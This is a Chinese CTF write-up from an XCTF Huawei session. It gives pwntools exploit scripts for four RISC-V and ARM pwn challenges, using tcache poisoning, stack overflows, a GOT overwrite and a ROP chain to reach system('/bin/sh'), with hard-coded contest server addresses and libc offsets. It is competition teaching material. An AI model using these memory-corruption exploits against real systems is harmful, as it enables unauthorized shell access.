XCTF-华为专场

题目不难,只是各种环境搭建吧。反正我是没搞起来鸿蒙的环境(TCL),第一场的时候在 hxp 了。最后没办法去 final,那只能给 final 出题了,希望大家玩得开心。

risc-v环境

honorbook

因为已经有一段时间了,有点忘记了,应该是一个单字节的溢出。远程没有开 ASLR,libc 是 2.27(以下都是 2.27),然后用 tcache attack 就可以了。

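from pwn import *
import sys

# Verbose tube logging for the whole script.
context.log_level = 'debug'
# NOTE(review): the challenge runs under qemu-riscv64 (see get_sh), yet arch is
# set to 'arm'; p64() is fixed-width and unaffected, but pack()/asm() would be.
context.arch = 'arm'
# Selects the "local qemu with gdb stub" branch of get_sh().
remote_gdb = True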

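def get_sh(other_libc=None):
    """Open a tube to the challenge and return it.

    Args:
        other_libc: accepted for call-site compatibility; not used here.

    Returns:
        A pwntools tube. ``use_remote`` selects the contest server (and also
        publishes the tube as the module-level ``p``); otherwise ``remote_gdb``
        starts the binary under qemu-riscv64 with a gdb stub on port 1234 and
        waits for Enter before returning; the last branch is a plain qemu run.
    """
    global p
    # Renamed from ``remote``: the original rebound pwntools' remote() to 0 and
    # then called it; ``null`` was also not a Python name.
    use_remote = 0
    if use_remote:
        p = remote('121.36.192.114', 9999)
        return p  # the original fell through and returned None here
    if remote_gdb:
        sh = process(["./qemu-riscv64", "-g", "1234", "-L", "./libs", "./honorbook"])
        log.info('Please use GDB remote!(Enter to continue)')
        raw_input()  # Python 2 builtin (input() on Python 3)
        return sh
    # NOTE(review): this fallback launches ./melong with an ARM sysroot rather
    # than ./honorbook — looks like a leftover from another script; confirm.
    return process(["./qemu-riscv64", "-L", "/usr/arm-linux-gnueabi", "./melong"])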

def add(idx, na, ma):
    """Menu option 1: create entry *idx* with name *na* and body *ma*.

    The option, the index and the name are each sent as a line after a
    ": " prompt; the body *ma* is sent raw (no newline appended), so callers
    include their own "\\n" when the program expects one.
    """
    for answer in ("1", str(idx), na):
        p.recvuntil(": ")
        p.sendline(answer)
    p.recvuntil(": ")
    p.send(ma)
def delete(idx):
    """Menu option 2: free entry *idx*."""
    choice, target = str(2), str(idx)
    p.recvuntil(": ")
    p.sendline(choice)
    p.recvuntil(": ")
    p.sendline(target)
def show(idx):
    """Menu option 3: print entry *idx* (output is left in the tube)."""
    choice, target = str(3), str(idx)
    p.recvuntil(": ")
    p.sendline(choice)
    p.recvuntil(": ")
    p.sendline(target)
def edit(idx, ma):
    """Menu option 4: replace the body of entry *idx* with *ma*.

    *ma* is passed through str() before sending; under Python 3 a bytes
    value would therefore arrive as its repr, so pass str here.
    """
    for answer in ("4", str(idx), str(ma)):
        p.recvuntil(": ")
        p.sendline(answer)
if __name__ == "__main__":
#p = get_sh(True)
p =remote("121.36.192.114",9999)
lib_base=0x4000886000
add(1,"\x11","\x11\n")
add(2,"\x22","\x22\n")
add(3,"\x33","\x33\n")
delete(1)
add(1,"\x11","\xf1"*0xe9)
delete(2)
add(2,b"/bin/sh\x00",b"\x00"*0x28+p64(0xf1)+p64(lib_base+0x209830)+b"\n")
add(5,"\x11","\x33\n")
add(6,"\x11",p64(lib_base+0x1388fe)*2+b"\n")
delete(2)
p.interactive()

harmoshell

很迷,一个迷惑的栈溢出漏洞,同样没有 ASLR,所以先 leak 再做。用到的地址是把 libc 放进 Ghidra 里找到的。

#!/usr/bin/env python
# coding=utf-8
from pwn import*

p = remote("121.37.222.236","9999")
#p = process(["./qemu-riscv64", "-g", "1234", "-L", "./libs", "./harmoshell"])
context.log_level="debug"
def add(name):
    """Create file *name* through the shell's ``touch`` command."""
    cmd = "touch " + str(name)
    p.recvuntil("$")
    p.sendline(cmd)
def show(name):
    """Print file *name* through the shell's ``cat`` command."""
    cmd = "cat " + str(name)
    p.recvuntil("$")
    p.sendline(cmd)

def echo(name, cn, idx):
    """Write *cn* into file *name* via the shell's echo redirection.

    A truthy *idx* uses ``echo >`` (overwrite), otherwise ``echo >>``
    (append). The content goes on its own line after a short pause,
    presumably so the two lines are not read together.
    """
    redirect = "echo > " if idx else "echo >> "
    p.recvuntil("$")
    p.sendline(redirect + str(name))
    sleep(0.1)
    p.sendline(cn)
def rm(name):
    """Remove file *name* through the shell's ``rm`` command."""
    cmd = "rm " + str(name)
    p.recvuntil("$")
    p.sendline(cmd)

def ls():
    """List files through the shell's ``ls`` command."""
    cmd = "ls"
    p.recvuntil("$")
    p.sendline(cmd)

# Hard-coded libc load address; the writeup says the remote side has no ASLR.
# Note that this script performs no leak despite the writeup's wording.
libc_base = 0x4000886000
# Difference between two hard-coded stack addresses, less 8 — presumably the
# distance from the overflowing buffer to the slot being overwritten. The two
# addresses come from the author's debugging session and are not derived here.
offset = 0x00000040008004d0-0x0000004000800390-0x8
# Name suggests execv in libc (writeup: located with Ghidra); not verifiable here.
execv_offset = libc_base+0x00183814
# "echo > test0" with the payload right-padded (on the left) with 'a' to
# offset+8 bytes so the trailing quadwords land at a fixed position; mode 1
# selects "echo > ".
echo("test"+str(0),(b"b"*0x8+p64(0)+b"b"*0x8+p64(0)*2+p64(execv_offset)).rjust(offset+8,b"a"),1)
p.interactive()

harmoshell

堆溢出,简单题

from pwn import *
# log_level=True is accepted by pwntools as the integer level 1.
context(log_level=True)
# Local / alternate targets kept for reference:
#sh = remote("121.36.58.215",1337)
#sh=process("./qemu-riscv64 -L ./libs/ ./harmoshell2",shell=True)
#sh= process('./a.out')
libc = ELF('libc-2.27.so')  # symbol offsets below come from this build
sh = remote('139.159.132.55', 9999)
elf = ELF("harmoshell2")  # challenge binary, used for its GOT
#libc = ELF("libuClibc-1.0.34.so")
def touch(filename):
    """Create *filename* via the shell's ``touch``."""
    cmd = "touch " + str(filename)
    sh.recvuntil("$ ")
    sh.sendline(cmd)
def rm(filename):
    """Remove *filename* via the shell's ``rm``."""
    cmd = "rm " + str(filename)
    sh.recvuntil("$ ")
    sh.sendline(cmd)
def cat(filename):
    """Print *filename* via the shell's ``cat``."""
    cmd = "cat " + str(filename)
    sh.recvuntil("$ ")
    sh.sendline(cmd)
def echo(filename, data):
    """``echo > filename`` followed by *data* as a full line (str() applied)."""
    sh.recvuntil("$ ")
    for line in ("echo > " + str(filename), str(data)):
        sh.sendline(line)
def echo2(filename, data):
    """``echo >> filename`` followed by *data* sent raw, without a newline."""
    cmd = "echo >> " + str(filename)
    sh.recvuntil("$ ")
    sh.sendline(cmd)
    sh.send(str(data))
# Dead code: an earlier heap-grooming attempt kept as a string literal.
'''
for i in range(10):
touch(str(i))

for i in range(6):
rm(str(7-i))
rm(0)
rm(1)
for i in range(6):
touch(str(i))
touch(5)
touch(6)
echo(6,'a'*7)
#echo2(6,'b'*0x8)
cat(6)
#p.recvuntil('a'*7+'\x0a')
'''
# Blocks until Enter (Python 2 builtin) before any writes are made.
raw_input()
# libc base: an address from the author's debugging session minus the distance
# between that same address and the libc mapping start seen in that session.
# The page does not say which symbol it was; the remote side has no ASLR.
libcbase=0x4000a8d9f8-(0x0000004000a929f8-0x400088B000)
free=libcbase+libc.sym['__free_hook']  # computed but not used below
print hex(libcbase)  # Python 2 print statement
system=libcbase+libc.sym['system']
one=libcbase+0x018381c  # name suggests a one-gadget offset; unused below
touch(5)
touch(6)

# "echo >" into file 5: a 0xff-byte body starting with "/bin/sh\0". The
# writeup calls this a heap overflow, so the tail presumably runs past the
# entry's own buffer.
echo(5,'/bin/sh\x00'+'a'*0xf7)
# "echo >>" appends 0x28 more bytes, the last of which are the address of the
# strlen GOT slot read from the challenge ELF.
echo2(5,'b'*0x10+p64(6)+'e'*0x8+p64(elf.got['strlen']))
#cat('\x06')
# "echo >" into the file named by the raw byte \x06 (not the text "6"), with
# the computed system address as its content.
sh.recvuntil("$ ")
sh.sendline("echo > "+'\x06')
sh.send(p64(system))
sh.recvuntil("$ ")
sh.sendline("/bin/sh\x00")
#raw_input()
#rm('\x06')

sh.interactive()

arm

没开 ASLR,leak 然后打,神似国赛题。

from pwn import *

debug = 0

#context.terminal = ['tmux','-x','sh','-c']
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

if not debug:
    # Contest server.
    p = remote('139.159.210.220', 9999)
else:
    # Local run with gdb attached in a tmux split; the binary path is left empty.
    p = process('')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    gdb.attach(p)

def ru(x):
    """Read from the tube up to and including *x*; return what was read."""
    data = p.recvuntil(x)
    return data

def se(x):
    """Send *x* raw (no newline appended)."""
    payload = x
    p.send(payload)

def sl(x):
    """Send *x* followed by a newline."""
    payload = x
    p.sendline(payload)

# Wait for the program's prompt.
ru('input: ')
# Hard-coded 32-bit libc base: the writeup says ASLR is off on the remote side.
base = 0xff69e000
system = base + 0x34810  # libc-relative offsets from the author's analysis
binsh = base + 0xfe861
# Earlier variant of the payload, kept by the author:
#se('a'*0x100+p32(0x104A0)+p32(0x10540)+p32(0x2100C)+p32(0)+p32(0x2100C)+p32(0)*2+p32(0)*2+p32(0x10548))
# 0x100 bytes of padding, then a sequence of 32-bit words. The small values
# (0x104A0, 0x10540, 0x2100C, 0x10348, 0x1054C) look like addresses in the
# non-PIE binary, but their roles are not shown on this page.
se('a'*0x100+p32(0x104A0)+p32(0x10540)+p32(0x2100C)+p32(0)+p32(binsh)+p32(0)*2+p32(0)*2+p32(0x10348)+p32(system)+p32(0x1054C))

p.interactive()

总结

今年算是没怎么打比赛,刚开始打了第一场,还有一场 hxp,后面可能会更,希望大家 XCTF-final 玩得开心。